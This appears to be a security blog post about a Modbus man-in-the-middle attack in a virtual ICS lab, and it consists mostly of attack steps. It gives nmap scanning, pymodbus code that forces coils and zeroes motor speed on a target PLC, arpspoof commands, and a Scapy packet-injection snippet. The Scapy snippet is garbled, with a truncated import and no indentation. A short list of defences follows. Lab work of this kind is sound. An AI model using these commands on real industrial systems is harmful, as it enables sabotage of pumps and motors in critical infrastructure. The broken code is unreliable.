Modbus Man-in-the-Middle Attack: Exploiting ICS/OT Security

Modbus, one of the oldest industrial protocols (since 1979), remains widely used in factories, energy systems, and critical infrastructure. Despite its simplicity and speed, Modbus lacks encryption and authentication, making it highly vulnerable to attacks. This article explores a Modbus Man-in-the-Middle (MitM) attack using Labshock, a virtual ICS/OT security lab.

What’s Covered in the Lab?

✅ Modbus Theory & Basics

RTU vs. TCP vs. ASCII
Master/Slave architecture
Common function codes

✅ Working with Modbus Data

Coils (binary control)
Input & Holding Registers (sensor data)
Wireshark packet analysis

✅ Hands-On Labshock Demo

Simulate Modbus devices
Python scripting with `pymodbus`
Read/Write coils & registers

✅ Modbus Attack Walkthrough

Scanning for Modbus devices
Writing malicious coil values (e.g., stopping a pump)
Altering register values (e.g., changing motor speed)

✅ New: Man-in-the-Middle Attack

Intercepting SCADA-PLC traffic
Real-time packet manipulation
No authentication = Easy exploitation

You Should Know: Practical Exploitation Steps

1. Setting Up Labshock

git clone https://github.com/zakharb/labshock 
cd labshock 
docker-compose up -d  Deploys Modbus simulation

2. Scanning for Modbus Devices

nmap -p 502 --script modbus-discover.nse 192.168.1.0/24

3. Python Exploitation (pymodbus)

from pymodbus.client import ModbusTcpClient

client = ModbusTcpClient('192.168.1.100')  Target PLC 
client.write_coil(0, True)  Force a coil ON (e.g., stop pump) 
client.write_register(1, 0)  Set motor speed to 0

4. Wireshark Traffic Analysis

wireshark -k -i eth0 -Y "modbus"

5. ARP Spoofing for MitM

arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.100  SCADA <> PLC

6. Modbus Packet Manipulation (Scapy)

from scapy.all import

def modify_modbus(pkt): 
if pkt.haslayer(TCP) and pkt.dport == 502: 
pkt.load = b"\x00\x01\x00\x00\x00\x06\x01\x06\x00\x01\x00\x00"  Malicious write 
sendp(pkt, iface="eth0")

What Undercode Say

Modbus remains a critical yet insecure protocol in ICS/OT environments. Attackers can easily intercept and manipulate traffic due to the lack of encryption. Defenders must:
– Segment Modbus traffic (VLANs, firewalls)
– Monitor for abnormal writes (OT SIEM rules)
– Consider secure alternatives (Modbus/TLS, MQTT)

Expected Output:

Successful MitM interception in Wireshark
Coil/register values altered without authentication
Python scripts executing malicious writes

References:

Reported By: Zakharb Full – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Listen to this Post

What’s Covered in the Lab?

✅ Modbus Theory & Basics

✅ Working with Modbus Data

✅ Hands-On Labshock Demo

✅ Modbus Attack Walkthrough

✅ New: Man-in-the-Middle Attack

You Should Know: Practical Exploitation Steps

1. Setting Up Labshock

2. Scanning for Modbus Devices

3. Python Exploitation (pymodbus)

4. Wireshark Traffic Analysis

5. ARP Spoofing for MitM

6. Modbus Packet Manipulation (Scapy)

What Undercode Say

Expected Output:

References:

References:

Join Our Cyber World:

Related Posts: